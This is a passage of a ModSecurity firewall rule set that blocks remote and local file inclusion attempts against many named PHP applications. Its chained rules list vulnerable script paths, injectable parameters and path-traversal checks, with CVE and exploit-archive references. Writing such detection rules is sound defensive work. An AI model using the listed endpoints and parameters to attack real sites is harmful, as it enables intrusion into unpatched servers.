"chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011254,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Redaxo CMS index.inc.php Remote File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:REX[INCLUDE_PATH]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Redaxo CMS index.inc.php Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2011255) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Redaxo CMS specials.inc.php Remote File Inclusion Attempt SecRule REQUEST_LINE "@contains /include/pages/specials.inc.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011255,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Redaxo CMS specials.inc.php Remote File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:REX[INCLUDE_PATH]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Redaxo CMS specials.inc.php Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2010124) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS SERWeb load_lang.php configdir Parameter Remote File Inclusion SecRule REQUEST_LINE "@contains /load_lang.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010124,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS SERWeb load_lang.php configdir Parameter Remote File Inclusion',tag:'web-application-attack',tag:'bugtraq,26747'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:_SERWEB[configdir]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS SERWeb load_lang.php configdir Parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2010125) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS SERWeb main_prepend.php functionsdir Parameter Remote File Inclusion SecRule REQUEST_LINE "@contains /main_prepend.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010125,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS SERWeb main_prepend.php functionsdir Parameter Remote File Inclusion',tag:'web-application-attack',tag:'bugtraq,26747'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:_SERWEB[functionsdir]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS SERWeb main_prepend.php functionsdir Parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009653) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS SMA-DB format.php _page_css Parameter Remote File Inclusion SecRule REQUEST_LINE "@contains /theme/format.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009653,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS SMA-DB format.php _page_css Parameter Remote File Inclusion',tag:'web-application-attack',tag:'bugtraq,34569'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:_page_css/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS SMA-DB format.php _page_css Parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009654) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS SMA-DB format.php _page_javascript Parameter Remote File Inclusion SecRule REQUEST_LINE "@contains /theme/format.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009654,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS SMA-DB format.php _page_javascript Parameter Remote File Inclusion',tag:'web-application-attack',tag:'bugtraq,34569'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:_page_javascript/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS SMA-DB format.php _page_javascript Parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009656) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS SMA-DB format.php _page_content Parameter Remote File Inclusion SecRule REQUEST_LINE "@contains /theme/format.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009656,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS SMA-DB format.php _page_content Parameter Remote File Inclusion',tag:'web-application-attack',tag:'bugtraq,34569'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:_page_content/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS SMA-DB format.php _page_content Parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2011209) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS ClearSite device_admin.php cs_base_path Parameter Remote File Inclusion Attempt SecRule REQUEST_LINE "@contains /include/admin/device_admin.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011209,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS ClearSite device_admin.php cs_base_path Parameter Remote File Inclusion Attempt',tag:'web-application-attack',tag:'cve,CVE-2010-2145'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:cs_base_path/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS ClearSite device_admin.php cs_base_path Parameter Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2010922) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS SaurusCMS class.writeexcel_workbook.inc.php class_path Remote File Inclusion Attempt SecRule REQUEST_LINE "@contains /classes/excel/class.writeexcel_workbook.inc.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010922,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS SaurusCMS class.writeexcel_workbook.inc.php class_path Remote File Inclusion Attempt',tag:'web-application-attack',tag:'url,www.packetstormsecurity.org/0912-exploits/saurus-rfi.txt'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:class_path/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS SaurusCMS class.writeexcel_workbook.inc.php class_path Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2010923) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS SaurusCMS class.writeexcel_worksheet.inc.php class_path Remote File Inclusion Attempt SecRule REQUEST_LINE "@contains /classes/excel/class.writeexcel_worksheet.inc.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010923,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS SaurusCMS class.writeexcel_worksheet.inc.php class_path Remote File Inclusion Attempt',tag:'web-application-attack',tag:'url,www.packetstormsecurity.org/0912-exploits/saurus-rfi.txt'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:class_path/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS SaurusCMS class.writeexcel_worksheet.inc.php class_path Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009123) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS SezHoo SezHooTabsAndActions.php IP Parameter Remote File Inclusion SecRule REQUEST_LINE "@contains /SezHooTabsAndActions.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009123,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS SezHoo SezHooTabsAndActions.php IP Parameter Remote File Inclusion',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/6751'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:IP/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS SezHoo SezHooTabsAndActions.php IP Parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2003746) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Simple PHP Script Gallery Remote Inclusion index.php gallery SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003746,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS Simple PHP Script Gallery Remote Inclusion index.php gallery',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/23534'" SecRule &TX:'/RFI.*ARGS:gallery/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Simple PHP Script Gallery Remote Inclusion index.php gallery',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2008996) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Simple Text-File Login script slogin_path parameter remote file inclusion SecRule REQUEST_LINE "@contains /slogin_lib.inc.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2008996,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Simple Text-File Login script slogin_path parameter remote file inclusion',tag:'web-application-attack',tag:'bugtraq,32811'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:slogin_path/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Simple Text-File Login script slogin_path parameter remote file inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2010564) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Sisplet CMS komentar.php site_path Parameter Remote File Inclusion Attempt SecRule REQUEST_LINE "@contains /main/forum/komentar.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010564,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Sisplet CMS komentar.php site_path Parameter Remote File Inclusion Attempt',tag:'web-application-attack',tag:'bugtraq,23334'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:site_path/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Sisplet CMS komentar.php site_path Parameter Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009070) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS phpSkelSite TplSuffix parameter local file inclusion SecRule REQUEST_LINE "@contains /login.tpl.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009070,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS phpSkelSite TplSuffix parameter local file inclusion',tag:'web-application-attack',tag:'bugtraq,33092'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:TplSuffix "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS phpSkelSite TplSuffix parameter local file inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009071) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS phpSkelSite theme parameter remote file inclusion SecRule REQUEST_LINE "@contains /login.tpl.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009071,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS phpSkelSite theme parameter remote file inclusion',tag:'web-application-attack',tag:'bugtraq,33092'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:theme/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS phpSkelSite theme parameter remote file inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009179) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS SnippetMaster vars.inc.php _SESSION Parameter Remote File Inclusion SecRule REQUEST_LINE "@contains /vars.inc.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009179,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS SnippetMaster vars.inc.php _SESSION Parameter Remote File Inclusion',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:_SESSION[SCRIPT_PATH]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS SnippetMaster vars.inc.php _SESSION Parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009180) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS SnippetMaster pcltar.lib.php g_pcltar_lib_dir Parameter Remote File Inclusion SecRule REQUEST_LINE "@contains /pcltar.lib.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009180,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS SnippetMaster pcltar.lib.php g_pcltar_lib_dir Parameter Remote File Inclusion',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:g_pcltar_lib_dir/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS SnippetMaster pcltar.lib.php g_pcltar_lib_dir Parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009181) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS SnippetMaster vars.inc.php _SESSION Parameter Local File Inclusion SecRule REQUEST_LINE "@contains /vars.inc.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009181,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS SnippetMaster vars.inc.php _SESSION Parameter Local File Inclusion',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:_SESSION[SCRIPT_PATH] "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS SnippetMaster vars.inc.php _SESSION Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009182) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS SnippetMaster pcltar.lib.php g_pcltar_lib_dir Parameter Local File Inclusion SecRule REQUEST_LINE "@contains /pcltar.lib.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009182,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS SnippetMaster pcltar.lib.php g_pcltar_lib_dir Parameter Local File Inclusion',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:g_pcltar_lib_dir "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS SnippetMaster pcltar.lib.php g_pcltar_lib_dir Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2011051) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Softsaurus CMS subHeader.php objects_path Parameter Remote File Inclusion -1 SecRule REQUEST_LINE "@contains /content/themes/softsaurus_default/pages/subHeader.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011051,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Softsaurus CMS subHeader.php objects_path Parameter Remote File Inclusion -1',tag:'web-application-attack',tag:'bugtraq,38842'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:objects_path/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Softsaurus CMS subHeader.php objects_path Parameter Remote File Inclusion -1',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2011052) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Softsaurus CMS subHeader.php objects_path Parameter Remote File Inclusion -2 SecRule REQUEST_LINE "@contains /content/themes/softsaurus_stretched/pages/subHeader.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011052,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Softsaurus CMS subHeader.php objects_path Parameter Remote File Inclusion -2',tag:'web-application-attack',tag:'bugtraq,38842'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:objects_path/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Softsaurus CMS subHeader.php objects_path Parameter Remote File Inclusion -2',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009144) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Sourdough neededFiles Parameter Remote File Inclusion SecRule REQUEST_LINE "@contains /example_clientside_javascript.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009144,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Sourdough neededFiles Parameter Remote File Inclusion',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:neededFiles[patForms]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Sourdough neededFiles Parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009145) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Syntax Desktop preview.php synTarget Parameter Local File Inclusion SecRule REQUEST_LINE "@contains /preview.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009145,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Syntax Desktop preview.php synTarget Parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,33601'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:synTarget "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Syntax Desktop preview.php synTarget Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009229) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS TECHNOTE shop_this_skin_path Paramter Remote File Inclusion SecRule REQUEST_LINE "@contains /body_default.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009229,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS TECHNOTE shop_this_skin_path Paramter Remote File Inclusion',tag:'web-application-attack',tag:'cve,CVE-2009-0441'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:shop_this_skin_path/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS TECHNOTE shop_this_skin_path Paramter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009230) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS TECHNOTE shop_this_skin_path Paramter Local File Inclusion SecRule REQUEST_LINE "@contains /body_default.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009230,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS TECHNOTE shop_this_skin_path Paramter Local File Inclusion',tag:'web-application-attack',tag:'cve,CVE-2009-0441'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:shop_this_skin_path "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS TECHNOTE shop_this_skin_path Paramter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2003705) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS TellTarget CMS Remote Inclusion site_conf.php ordnertiefe SecRule REQUEST_LINE "@contains /site_conf.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003705,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS TellTarget CMS Remote Inclusion site_conf.php ordnertiefe',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3885'" SecRule ARGS_NAMES "(?i:ordnertiefe)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS TellTarget CMS Remote Inclusion site_conf.php ordnertiefe',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2003706) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS TellTarget CMS Remote Inclusion class.csv.php tt_docroot SecRule REQUEST_LINE "@contains /class.csv.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003706,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS TellTarget CMS Remote Inclusion class.csv.php tt_docroot',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3885'" SecRule ARGS_NAMES "(?i:tt_docroot)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS TellTarget CMS Remote Inclusion class.csv.php tt_docroot',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2003707) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS TellTarget CMS Remote Inclusion produkte_nach_serie.php tt_docroot SecRule REQUEST_LINE "@contains /produkte_nach_serie.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003707,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS TellTarget CMS Remote Inclusion produkte_nach_serie.php tt_docroot',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3885'" SecRule ARGS_NAMES "(?i:tt_docroot)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS TellTarget CMS Remote Inclusion produkte_nach_serie.php tt_docroot',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2003708) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS TellTarget CMS Remote Inclusion ref_kd_rubrik.php tt_docroot SecRule REQUEST_LINE "@contains /functionen/ref_kd_rubrik.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003708,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS TellTarget CMS Remote Inclusion ref_kd_rubrik.php tt_docroot',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3885'" SecRule ARGS_NAMES "(?i:tt_docroot)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS TellTarget CMS Remote Inclusion ref_kd_rubrik.php tt_docroot',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2003709) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS TellTarget CMS Remote Inclusion hg_referenz_jobgalerie.php tt_docroot SecRule REQUEST_LINE "@contains /hg_referenz_jobgalerie.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003709,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS TellTarget CMS Remote Inclusion hg_referenz_jobgalerie.php tt_docroot',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3885'" SecRule ARGS_NAMES "(?i:tt_docroot)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS TellTarget CMS Remote Inclusion hg_referenz_jobgalerie.php tt_docroot',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2003710) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS TellTarget CMS Remote Inclusion surfer_anmeldung_NWL.php tt_docroot SecRule REQUEST_LINE "@contains /surfer_anmeldung_NWL.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003710,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS TellTarget CMS Remote Inclusion surfer_anmeldung_NWL.php tt_docroot',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3885'" SecRule ARGS_NAMES "(?i:tt_docroot)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS TellTarget CMS Remote Inclusion surfer_anmeldung_NWL.php 